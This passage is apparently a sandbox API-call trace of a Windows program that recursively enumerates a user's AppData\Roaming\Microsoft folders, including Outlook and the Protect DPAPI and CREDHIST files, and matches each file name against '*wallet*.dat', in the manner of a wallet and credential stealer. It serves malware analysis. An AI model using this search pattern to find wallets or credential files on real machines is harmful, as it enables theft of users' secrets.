[0234.732] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 61 [0234.732] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent") returned 23 [0234.732] PathMatchSpecA (pszFile="Recent", pszSpec="*wallet*.dat") returned 0 [0234.733] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned 63 [0234.733] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1960 [0234.733] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.733] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xa481d59b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa481d59b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="index.dat", cAlternateFileName="")) returned 1 [0234.733] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0234.733] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent\\index.dat") returned 33 [0234.733] PathMatchSpecA (pszFile="index.dat", pszSpec="*wallet*.dat") returned 0 [0234.733] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat\\*") returned 73 [0234.734] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0xa481d59b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0xa481d59b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xa481d59b, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1c, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x6e0069, cFileName="d", cAlternateFileName="C")) returned 0xffffffff [0234.734] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0234.734] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 75 [0234.734] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent\\Templates.LNK") returned 37 [0234.734] PathMatchSpecA (pszFile="Templates.LNK", pszSpec="*wallet*.dat") returned 0 [0234.734] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK\\*") returned 77 [0234.734] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0xa4689310, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0xa4689310, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xa481d59b, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4ab, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650054, cFileName="m", cAlternateFileName="C")) returned 0xffffffff [0234.734] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0234.735] FindClose (in: hFindFile=0x6e1960 | out: hFindFile=0x6e1960) returned 1 [0234.735] FindNextFileA (in: hFindFile=0x6e1ce0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="Recent", cAlternateFileName="")) returned 0 [0234.735] FindClose (in: hFindFile=0x6e1ce0 | out: hFindFile=0x6e1ce0) returned 1 [0234.735] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0234.735] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook") returned 55 [0234.735] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook") returned 17 [0234.735] PathMatchSpecA (pszFile="Outlook", pszSpec="*wallet*.dat") returned 0 [0234.735] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned 57 [0234.735] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e1960 [0234.736] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.737] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abbe5b6, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6abbe5b6, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6acd6e90, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0234.737] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0234.737] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook\\Outlook.srs") returned 29 [0234.737] PathMatchSpecA (pszFile="Outlook.srs", pszSpec="*wallet*.dat") returned 0 [0234.737] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs\\*") returned 69 [0234.737] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x6abbe5b6, ftCreationTime.dwLowDateTime=0x1d70699, ftCreationTime.dwHighDateTime=0x6abbe5b6, ftLastAccessTime.dwLowDateTime=0x1d70699, ftLastAccessTime.dwHighDateTime=0x6acd6e90, ftLastWriteTime.dwLowDateTime=0x1d70699, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xa00, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x75004f, cFileName="t", cAlternateFileName="TEMPLA~1Ð\x07\x02")) returned 0xffffffff [0234.737] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x87797b5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0234.737] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0234.737] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook\\Outlook.xml") returned 29 [0234.737] PathMatchSpecA (pszFile="Outlook.xml", pszSpec="*wallet*.dat") returned 0 [0234.738] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml\\*") returned 69 [0234.738] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x877953e5, ftCreationTime.dwLowDateTime=0x1d70699, ftCreationTime.dwHighDateTime=0x877953e5, ftLastAccessTime.dwLowDateTime=0x1d70699, ftLastAccessTime.dwHighDateTime=0x87797b5c, ftLastWriteTime.dwLowDateTime=0x1d70699, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x956, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x75004f, cFileName="t", cAlternateFileName="TEMPLA~1Ð\x07\x02")) returned 0xffffffff [0234.738] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x87797b5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0234.738] FindClose (in: hFindFile=0x6e1960 | out: hFindFile=0x6e1960) returned 1 [0234.738] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x956, dwReserved1=0x4ab, cFileName="Protect", cAlternateFileName="")) returned 1 [0234.738] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect") returned 55 [0234.738] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Protect") returned 17 [0234.738] PathMatchSpecA (pszFile="Protect", pszSpec="*wallet*.dat") returned 0 [0234.738] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*") returned 57 [0234.738] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e1da0 [0234.739] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.739] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xa55c36e7, ftLastWriteTime.dwHighDateTime=0x1d7a941, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0234.739] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0234.739] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\CREDHIST") returned 26 [0234.739] PathMatchSpecA (pszFile="CREDHIST", pszSpec="*wallet*.dat") returned 0 [0234.739] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST\\*") returned 66 [0234.739] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x44792966, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x44792966, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0xa55c36e7, ftLastWriteTime.dwLowDateTime=0x1d7a941, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1c8, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x520043, cFileName="E", cAlternateFileName="TEMPLA~1Ð\x07\x02")) returned 0xffffffff [0234.739] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xde7dde0f, ftLastAccessTime.dwHighDateTime=0x1d7b055, ftLastWriteTime.dwLowDateTime=0xde7dde0f, ftLastWriteTime.dwHighDateTime=0x1d7b055, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0234.739] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 102 [0234.739] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 64 [0234.739] PathMatchSpecA (pszFile="S-1-5-21-1560258661-3990802383-1811730007-1000", pszSpec="*wallet*.dat") returned 0 [0234.739] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*") returned 104 [0234.739] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x562658a2, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x562658a2, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e17a0 [0234.740] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x562658a2, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x562658a2, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.740] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x562658a2, ftCreationTime.dwHighDateTime=0x1d82a22, ftLastAccessTime.dwLowDateTime=0x562658a2, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5626e193, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="26d4f968-a540-431b-ab1b-a50e9bbda5d1", cAlternateFileName="26D4F9~1")) returned 1 [0234.740] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1") returned 139 [0234.740] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1") returned 101 [0234.740] PathMatchSpecA (pszFile="26d4f968-a540-431b-ab1b-a50e9bbda5d1", pszSpec="*wallet*.dat") returned 0 [0234.740] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1\\*") returned 141 [0234.740] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x562658a2, ftCreationTime.dwLowDateTime=0x1d82a22, ftCreationTime.dwHighDateTime=0x562658a2, ftLastAccessTime.dwLowDateTime=0x1d82a22, ftLastAccessTime.dwHighDateTime=0x5626e193, ftLastWriteTime.dwLowDateTime=0x1d82a22, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x360032, cFileName="d", cAlternateFileName="C")) returned 0xffffffff [0234.740] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9a745757, ftCreationTime.dwHighDateTime=0x1d75217, ftLastAccessTime.dwLowDateTime=0x9a745757, ftLastAccessTime.dwHighDateTime=0x1d75217, ftLastWriteTime.dwLowDateTime=0xa55ebcf3, ftLastWriteTime.dwHighDateTime=0x1d7a941, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="b1182ce8-69d1-4194-8156-bc78cfec3a39", cAlternateFileName="B1182C~1")) returned 1 [0234.740] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39") returned 139 [0234.740] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39") returned 101 [0234.740] PathMatchSpecA (pszFile="b1182ce8-69d1-4194-8156-bc78cfec3a39", pszSpec="*wallet*.dat") returned 0 [0234.740] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39\\*") returned 141 [0234.740] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x9a745757, ftCreationTime.dwLowDateTime=0x1d75217, ftCreationTime.dwHighDateTime=0x9a745757, ftLastAccessTime.dwLowDateTime=0x1d75217, ftLastAccessTime.dwHighDateTime=0xa55ebcf3, ftLastWriteTime.dwLowDateTime=0x1d7a941, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x310062, cFileName="1", cAlternateFileName="C")) returned 0xffffffff [0234.741] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xde7dde0f, ftCreationTime.dwHighDateTime=0x1d7b055, ftLastAccessTime.dwLowDateTime=0xde7dde0f, ftLastAccessTime.dwHighDateTime=0x1d7b055, ftLastWriteTime.dwLowDateTime=0xde7dde0f, ftLastWriteTime.dwHighDateTime=0x1d7b055, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="be39cc84-e9bf-4c2d-a3a5-e953c9f3df24", cAlternateFileName="BE39CC~1")) returned 1 [0234.741] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24") returned 139 [0234.741] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24") returned 101 [0234.741] PathMatchSpecA (pszFile="be39cc84-e9bf-4c2d-a3a5-e953c9f3df24", pszSpec="*wallet*.dat") returned 0 [0234.741] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24\\*") returned 141 [0234.741] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0xde7dde0f, ftCreationTime.dwLowDateTime=0x1d7b055, ftCreationTime.dwHighDateTime=0xde7dde0f, ftLastAccessTime.dwLowDateTime=0x1d7b055, ftLastAccessTime.dwHighDateTime=0xde7dde0f, ftLastWriteTime.dwLowDateTime=0x1d7b055, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650062, cFileName="3", cAlternateFileName="C")) returned 0xffffffff [0234.741] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xa5626547, ftLastWriteTime.dwHighDateTime=0x1d7a941, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, 